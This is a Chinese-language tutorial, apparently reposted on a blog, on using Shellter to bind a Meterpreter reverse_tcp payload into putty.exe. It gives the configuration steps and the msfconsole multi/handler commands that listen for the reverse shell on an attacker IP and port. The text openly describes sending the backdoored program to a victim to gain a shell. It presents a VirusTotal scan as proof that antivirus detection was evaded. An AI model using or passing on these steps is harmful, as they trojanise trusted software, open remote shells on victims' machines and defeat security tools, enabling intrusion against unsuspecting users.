Shellter是一款动态shellcode注入工具。利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安全工具的检查。下面我们来看看,如何使用该工具。
首先,我们先来下载该程序。
这是一个Zip的压缩包,我们利用 unzip 命令进行解压。解压后我们进入该目录文件。并设置我们需要的本地shellter类型。因为是用Windows程序进行绑定,因此我们的类型设置成 wineconsole shellter 。
wineconsole shellter
当我们回车后,接下来的界面会让我们选择操作模式。我们选择自动就行了。我们输入 a 。
下面,我们选择一个可执行文件,并将其拷贝到 shellter 文件夹下。让它和文件夹下的 shellter.exe 进行绑定。我拷贝的是 putty.exe 程序。这里一定要是可执行文件,才能进行绑定。
当我们做好以上操作,我们回到shellter终端。这里要求我们选择一个 绑定目标。我们就填 putty.exe 这样,他就会开始进行绑定。
当进程被成功绑定后,这里会列出一些关于payload的选项,要求我们选择一种 payload 类型,进行后续的攻击操作。这里我选择
1 Meterpreter_reverse_tcp
这里要求我们进行一些 payload 的基本配置。
LHOST:192.168.0.125 Kali的IP。
LPORT: 7777 监听端口。
配置成功后,我们会得到一个verified的确认,表示注入配置成功。我们回车继续操作。
现在我们要做的是,配置一个用来处理反弹连接的侦听器。我们打开 MSF 。
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.125
set lport 7777
exploit
做好这步,接下来要做的就是,将植入了后门的程序发送给攻击对象,此时只要受害者打开该执行程序,我们就成功获得了shell 。可以看到对方是 win7 的操作系统 x86架构等信息。
我们在 virustotal.com 网站上进行模拟安全扫描,进行病毒检测,我们看到杀毒软件并没有扫到病毒存在。这说明,我们成功绕过了杀毒软件。
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://itzsg.com/10260.html